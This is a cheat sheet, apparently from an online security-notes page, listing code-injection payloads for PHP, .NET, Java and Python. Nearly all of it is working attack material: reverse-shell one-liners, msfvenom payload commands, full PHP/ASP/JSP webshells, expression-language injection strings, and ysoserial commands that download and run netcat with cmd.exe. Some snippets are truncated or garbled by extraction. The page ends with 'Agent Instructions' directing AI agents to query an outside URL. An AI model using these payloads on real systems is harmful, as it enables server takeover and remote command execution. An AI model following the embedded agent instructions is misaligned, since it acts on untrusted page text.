# Code Injection ## PHP ### Reverse shell Linux ``` & /dev/tcp// 0>&1'"); php?> ``` From msfvenom ``` msfvenom -p php/reverse_php LHOST= LPORT= -f raw -o payload.php ``` ### Webshell ``` "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; } ?> ``` ### Code injection Inject terminal commands ``` echo exec(""); echo passthru(""); echo system(""); echo shell_exec(""); echo ``; ``` Inject PHP code (PHP delimiters not required) ``` eval('') assert('') ``` Information gathering ``` phpinfo(); posix_mkfifo(); posix_getlogin(); posix_ttyname(); getenv(); get_current_user(); proc_get_status(); get_cfg_var(); disk_free_space(); disk_total_space(); diskfreespace(); getcwd(); getlastmo(); getmygid(); getmyinode(); getmypid(); getmyuid(); ``` ## .NET ### Reverse shell From msfvenom ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f asp -o rv.asp msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f asp -o rv.asp msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f aspx -o rv.aspx msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f aspx -o rv.aspx ``` ### Webshell ASP ``` <%@ Language=VBScript %> <% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
" method="POST"> 
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>


<%
  If (IsObject(oFile)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>


```

ASPX

```
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>



awen asp.net webshell






Command:




```

## Java

### Reverse shell

JSP File


<%=Process p=new ProcessBuilder("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'").redirectErrorStream(true).start();Socket s=new Socket("<host>",<port>);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();%>



JSP From Msfvenom

```
msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f jsp -o rv.jsp
```

From WAR file

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
```

### Webshell

```







<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";

   if(cmd != null) {
      String s = null;
      try {
         String cmdFull = cmd;
         if(System.getProperty("os.name").toLowerCase().startsWith("windows")){
            cmdFull = "cmd.exe /C " + cmd;
         }
         Process p = Runtime.getRuntime().exec(cmdFull);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
            output += s;
         }
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>


<%=output %>


```

### Parameter injection

Inject terminal commands

```
${T(java.lang.Runtime).getRuntime().exec('')}
<%=T(java.lang.Runtime).getRuntime().exec('')%>
```

Information gathering

```
${class.getClassLoader()}
${class.getResource("").getPath()}
${T(java.lang.System).getenv()}

<%=class.getClassLoader()%>
<%={class.getResource("").getPath()%>
<%={T(java.lang.System).getenv()%>
```

### Deserialization

Exploit Java deserialization vulnerabilities using ysoserial (requires java installed on local machine). Can be downloaded from [here](https://github.com/frohoff/ysoserial)

#### Deploy payload

```
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit   CommonsCollections1 
```

#### NC upload and reverse shell

```
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit   CommonsCollections1 "powershell -c \"(new-object System.Net.WebClient).DownloadFile('http:///nc.exe','C:\\nc.exe')\""
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit   CommonsCollections1 "C:\\nc.exe -nv   -e cmd.exe"
```

#### Powershell

```
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit   CommonsCollections1 "powershell -c \"$c
```

## Python

### Reverse shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Parameter injection

Inject terminal code

```
os.system("")
import os;print(str(os.popen('').read()));
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-notes.gitbook.io/security-notes/web-attacks/code-injection.md?ask=
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.